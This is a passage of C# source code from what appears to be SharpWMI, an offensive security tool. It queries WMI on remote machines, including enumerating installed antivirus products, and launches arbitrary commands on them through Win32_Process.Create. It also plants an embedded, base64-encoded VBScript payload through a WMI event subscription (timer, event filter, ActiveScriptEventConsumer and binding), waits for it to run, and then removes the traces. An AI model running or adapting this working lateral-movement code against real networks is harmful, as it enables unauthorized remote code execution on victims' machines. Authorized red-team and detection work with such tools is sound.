83 | Console.WriteLine(" Remote VBS execution :\r\n SharpWMI.exe action=executevbs computername=HOST[,HOST2,...] [eventname=blah]\r\n");
84 |
85 | Console.WriteLine(" Note: Any remote function also takes an optional \"username=DOMAIN\\user\" \"password=Password123!\"\r\n");
86 | Console.WriteLine("\r\n Examples:\r\n");
87 | Console.WriteLine(" SharpWMI.exe action=query query=\"select * from win32_process\"");
88 | Console.WriteLine(" SharpWMI.exe action=query query=\"SELECT * FROM AntiVirusProduct\" namespace=\"root\\SecurityCenter2\"");
89 | Console.WriteLine(" SharpWMI.exe action=query computername=primary.testlab.local query=\"select * from win32_service\"");
90 | Console.WriteLine(" SharpWMI.exe action=query computername=primary,secondary query=\"select * from win32_process\"");
91 | Console.WriteLine(" SharpWMI.exe action=create computername=primary.testlab.local command=\"powershell.exe -enc ZQBj...\"");
92 | Console.WriteLine(" SharpWMI.exe action=executevbs computername=primary.testlab.local");
93 | Console.WriteLine(" SharpWMI.exe action=executevbs computername=primary.testlab.local username=\"TESTLAB\\harmj0y\" password=\"Password123!\"");
94 | }
95 |
96 | // helper used to wrap long output
97 | public static System.Collections.Generic.IEnumerable Split(string text, int partLength)
98 | {
99 | if (text == null) { throw new ArgumentNullException("singleLineString"); }
100 |
101 | if (partLength < 1) { throw new ArgumentException("'columns' must be greater than 0."); }
102 |
103 | var partCount = Math.Ceiling((double)text.Length / partLength);
104 | if (partCount < 2)
105 | {
106 | yield return text;
107 | }
108 |
109 | for (int i = 0; i < partCount; i++)
110 | {
111 | var index = i * partLength;
112 | var lengthLeft = Math.Min(partLength, text.Length - index);
113 | var line = text.Substring(index, lengthLeft);
114 | yield return line;
115 | }
116 | }
117 |
118 | static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = "")
119 | {
120 | ManagementObjectSearcher wmiData = null;
121 |
122 | try
123 | {
124 | if (String.IsNullOrEmpty(wmiNameSpace))
125 | {
126 | wmiData = new ManagementObjectSearcher(wmiQuery);
127 | }
128 | else
129 | {
130 | wmiData = new ManagementObjectSearcher(wmiNameSpace, wmiQuery);
131 | }
132 |
133 | ManagementObjectCollection data = wmiData.Get();
134 | Console.WriteLine();
135 |
136 | foreach (ManagementObject result in data)
137 | {
138 | System.Management.PropertyDataCollection props = result.Properties;
139 | foreach (System.Management.PropertyData prop in props)
140 | {
141 | string propValue = String.Format("{0}", prop.Value);
142 |
143 | // wrap long output to 80 lines
144 | if (!String.IsNullOrEmpty(propValue) && (propValue.Length > 90))
145 | {
146 | bool header = false;
147 | foreach (string line in Split(propValue, 80))
148 | {
149 | if (!header)
150 | {
151 | Console.WriteLine(String.Format("{0,30} : {1}", prop.Name, line));
152 | }
153 | else
154 | {
155 | Console.WriteLine(String.Format("{0,30} {1}", "", line));
156 | }
157 | header = true;
158 | }
159 | }
160 | else
161 | {
162 | Console.WriteLine(String.Format("{0,30} : {1}", prop.Name, prop.Value));
163 | }
164 | }
165 | Console.WriteLine();
166 | }
167 | }
168 | catch (Exception ex)
169 | {
170 | Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
171 | }
172 | }
173 |
174 | static void RemoteWMIQuery(string host, string wmiQuery, string wmiNameSpace, string username, string password)
175 | {
176 | if (wmiNameSpace == "")
177 | {
178 | wmiNameSpace = "root\\cimv2";
179 | }
180 |
181 | ConnectionOptions options = new ConnectionOptions();
182 |
183 | Console.WriteLine("\r\n Scope: \\\\{0}\\{1}", host, wmiNameSpace);
184 |
185 | if (!String.IsNullOrEmpty(username))
186 | {
187 | Console.WriteLine(" User credentials: {0}", username);
188 | options.Username = username;
189 | options.Password = password;
190 | }
191 | Console.WriteLine();
192 |
193 | ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
194 |
195 | try
196 | {
197 | scope.Connect();
198 |
199 | ObjectQuery query = new ObjectQuery(wmiQuery);
200 | ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query);
201 | ManagementObjectCollection data = searcher.Get();
202 |
203 | Console.WriteLine();
204 |
205 | foreach (ManagementObject result in data)
206 | {
207 | System.Management.PropertyDataCollection props = result.Properties;
208 | foreach (System.Management.PropertyData prop in props)
209 | {
210 | Console.WriteLine(String.Format("{0,30} : {1}", prop.Name, prop.Value));
211 | }
212 | Console.WriteLine();
213 | }
214 | }
215 | catch (Exception ex)
216 | {
217 | Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
218 | }
219 | }
220 |
221 | static void RemoteWMIExecute(string host, string command, string username, string password)
222 | {
223 | string wmiNameSpace = "root\\cimv2";
224 |
225 | ConnectionOptions options = new ConnectionOptions();
226 |
227 | Console.WriteLine("\r\n Host : {0}", host);
228 | Console.WriteLine(" Command : {0}", command);
229 |
230 | if (!String.IsNullOrEmpty(username))
231 | {
232 | Console.WriteLine(" User credentials : {0}", username);
233 | options.Username = username;
234 | options.Password = password;
235 | }
236 | Console.WriteLine();
237 |
238 | ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
239 |
240 | try
241 | {
242 | scope.Connect();
243 |
244 | var wmiProcess = new ManagementClass(scope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
245 |
246 | ManagementBaseObject inParams = wmiProcess.GetMethodParameters("Create");
247 | System.Management.PropertyDataCollection properties = inParams.Properties;
248 |
249 | inParams["CommandLine"] = command;
250 |
251 | ManagementBaseObject outParams = wmiProcess.InvokeMethod("Create", inParams, null);
252 |
253 | Console.WriteLine(" Creation of process returned : {0}", outParams["returnValue"]);
254 | Console.WriteLine(" Process ID : {0}\r\n", outParams["processId"]);
255 | }
256 | catch (Exception ex)
257 | {
258 | Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
259 | }
260 | }
261 |
262 | static string FormatVBSPayload()
263 | {
264 | var random = new Random();
265 | int fileNameLength = random.Next(3, 12);
266 | string fileName = RandomString(fileNameLength) + "." + RandomString(3);
267 | int objectNameLength = random.Next(6, 10);
268 | string objectClass = RandomString(objectNameLength);
269 | string payload = Convert.ToBase64String((byte[])SharpWMI.Properties.Resources.ScatterBrain);
270 | string finalString = vbsPayload.Replace("{0}", fileName).Replace("{1}", objectClass).Replace("{2}", payload);
271 | //Console.WriteLine(finalString);
272 | Console.WriteLine("[*] VBS Payload Filename on Remote System: C:\\Windows\\Temp\\{0}", fileName);
273 | return finalString;
274 | }
275 |
276 | static void RemoteWMIExecuteVBS(string host, string eventName, string username, string password)
277 | {
278 | try
279 | {
280 | ConnectionOptions options = new ConnectionOptions();
281 | if (!String.IsNullOrEmpty(username))
282 | {
283 | Console.WriteLine("[*] User credentials: {0}", username);
284 | options.Username = username;
285 | options.Password = password;
286 | }
287 | Console.WriteLine();
288 |
289 | // first create a 30 second timer on the remote host
290 | ManagementScope timerScope = new ManagementScope(string.Format(@"\\{0}\root\cimv2", host), options);
291 | ManagementClass timerClass = new ManagementClass(timerScope, new ManagementPath("__IntervalTimerInstruction"), null);
292 | ManagementObject myTimer = timerClass.CreateInstance();
293 | myTimer["IntervalBetweenEvents"] = (UInt32)30000;
294 | myTimer["SkipIfPassed"] = false;
295 | myTimer["TimerId"] = "Timer";
296 | try
297 | {
298 | Console.WriteLine("[*] Creating 'Timer' object on {0}", host);
299 | myTimer.Put();
300 | }
301 | catch (Exception ex)
302 | {
303 | Console.WriteLine("[X] Exception in creating timer object: {0}", ex.Message);
304 | return;
305 | }
306 |
307 | ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\subscription", host), options);
308 |
309 | // then install the __EventFilter for the timer object
310 | ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
311 | WqlEventQuery myEventQuery = new WqlEventQuery(@"SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'");
312 | ManagementObject myEventFilter = wmiEventFilter.CreateInstance();
313 | myEventFilter["Name"] = eventName;
314 | myEventFilter["Query"] = myEventQuery.QueryString;
315 | myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
316 | myEventFilter["EventNameSpace"] = @"\root\cimv2";
317 | try
318 | {
319 | Console.WriteLine("[*] Setting '{0}' event filter on {1}", eventName, host);
320 | myEventFilter.Put();
321 | }
322 | catch (Exception ex)
323 | {
324 | Console.WriteLine("[X] Exception in setting event filter: {0}", ex.Message);
325 | }
326 |
327 |
328 | // now create the ActiveScriptEventConsumer payload (VBS)
329 | ManagementObject myEventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
330 |
331 | myEventConsumer["Name"] = eventName;
332 | myEventConsumer["ScriptingEngine"] = "VBScript";
333 | myEventConsumer["ScriptText"] = FormatVBSPayload();
334 | myEventConsumer["KillTimeout"] = (UInt32)45;
335 |
336 | try
337 | {
338 | Console.WriteLine("[*] Setting '{0}' event consumer on {1}", eventName, host);
339 | myEventConsumer.Put();
340 | }
341 | catch (Exception ex)
342 | {
343 | Console.WriteLine("[X] Exception in setting event consumer: {0}", ex.Message);
344 | }
345 |
346 |
347 | // finally bind them together with a __FilterToConsumerBinding
348 | ManagementObject myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
349 |
350 | myBinder["Filter"] = myEventFilter.Path.RelativePath;
351 | myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
352 |
353 | try
354 | {
355 | Console.WriteLine("[*] Binding '{0}' event filter and consumer on {1}", eventName, host);
356 | myBinder.Put();
357 | }
358 | catch (Exception ex)
359 | {
360 | Console.WriteLine("[X] Exception in setting FilterToConsumerBinding: {0}", ex.Message);
361 | }
362 |
363 |
364 | // wait for everything to trigger
365 | Console.WriteLine("\r\n[*] Waiting 45 seconds for event to trigger on {0} ...\r\n", host);
366 | System.Threading.Thread.Sleep(45 * 1000);
367 |
368 |
369 | // finally, cleanup
370 | try
371 | {
372 | Console.WriteLine("[*] Removing 'Timer' internal timer from {0}", host);
373 | myTimer.Delete();
374 | }
375 | catch (Exception ex)
376 | {
377 | Console.WriteLine("[X] Exception in removing 'Timer' interval timer: {0}", ex.Message);
378 | }
379 |
380 | try
381 | {
382 | Console.WriteLine("[*] Removing FilterToConsumerBinding from {0}", host);
383 | myBinder.Delete();
384 | }
385 | catch (Exception ex)
386 | {
387 | Console.WriteLine("[X] Exception in removing FilterToConsumerBinding: {0}", ex.Message);
388 | }
389 |
390 | try
391 | {
392 | Console.WriteLine("[*] Removing '{0}' event filter from {1}", eventName, host);
393 | myEventFilter.Delete();
394 | }
395 | catch (Exception ex)
396 | {
397 | Console.WriteLine("[X] Exception in removing event filter: {0}", ex.Message);
398 | }
399 |
400 | try
401 | {
402 | Console.WriteLine("[*] Removing '{0}' event consumer from {0}\r\n", eventName, host);
403 | myEventConsumer.Delete();
404 | }
405 | catch (Exception ex)
406 | {
407 | Console.WriteLine("[X] Exception in removing event consumer: {0}", ex.Message);
408 | }
409 | }
410 | catch (Exception ex)
411 | {
412 | Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
413 | Console.WriteLine(ex);
414 | }
415 | }
416 |
417 | static void Main(string[] args)
418 | {
419 | if (args.Length < 2)
420 | {
421 | Usage();
422 | return;
423 | }
424 |
425 | var arguments = new Dictionary();
426 | foreach (string argument in args)
427 | {
428 | int idx = argument.IndexOf('=');
429 | if (idx > 0)
430 | arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
431 | }
432 |
433 | string username = "";
434 | string password = "";
435 |
436 | if (arguments.ContainsKey("username"))
437 | {
438 | if (!arguments.ContainsKey("password"))
439 | {
440 | Usage();
441 | return;
442 | }
443 | else
444 | {
445 | username = arguments["username"];
446 | password = arguments["password"];
447 | }
448 | }
449 |
450 | if (arguments.ContainsKey("password") && !arguments.ContainsKey("username"))
451 | {
452 | Usage();
453 | return;
454 | }
455 |
456 | if (!arguments.ContainsKey("action"))
457 | {
458 | Usage();
459 | return;
460 | }
461 |
462 | if (arguments["action"] == "query")
463 | {
464 | if (!arguments.ContainsKey("query"))
465 | {
466 | Usage();
467 | return;
468 | }
469 |
470 | if (arguments.ContainsKey("computername"))
471 | {
472 | // remote query
473 | string[] computerNames = arguments["computername"].Split(',');
474 | foreach (string computerName in computerNames) {
475 | if (arguments.ContainsKey("namespace"))
476 | {
477 | RemoteWMIQuery(computerName, arguments["query"], arguments["namespace"], username, password);
478 | }
479 | else
480 | {
481 | RemoteWMIQuery(computerName, arguments["query"], "", username, password);
482 | }
483 | }
484 | }
485 | else
486 | {
487 | // local query
488 | if (arguments.ContainsKey("namespace"))
489 | {
490 | LocalWMIQuery(arguments["query"], arguments["namespace"]);
491 | }
492 | else
493 | {
494 | LocalWMIQuery(arguments["query"]);
495 | }
496 | }
497 | }
498 |
499 | else if (arguments["action"] == "create")
500 | {
501 | // remote process call creation
502 | if ((arguments.ContainsKey("computername")) && (arguments.ContainsKey("command")))
503 | {
504 | string[] computerNames = arguments["computername"].Split(',');
505 | foreach (string computerName in computerNames)
506 | {
507 | RemoteWMIExecute(computerName, arguments["command"], username, password);
508 | }
509 | }
510 | else
511 | {
512 | Usage();
513 | return;
514 | }
515 | }
516 |
517 | else if (arguments["action"] == "executevbs")
518 | {
519 | // remote VBS execution
520 | if (arguments.ContainsKey("computername"))
521 | {
522 | string[] computerNames = arguments["computername"].Split(',');
523 | foreach (string computerName in computerNames)
524 | {
525 | string eventName = "Debug";
526 | if (arguments.ContainsKey("eventname"))
527 | {
528 | eventName = arguments["eventname"];
529 | }
530 | RemoteWMIExecuteVBS(computerName, eventName, username, password);
531 | }
532 | }
533 | else
534 | {
535 | Usage();
536 | return;
537 | }
538 | }
539 |
540 | else
541 | {
542 | Usage();
543 | return;
544 | }
545 | }
546 | }
547 | }
548 |
--------------------------------------------------------------------------------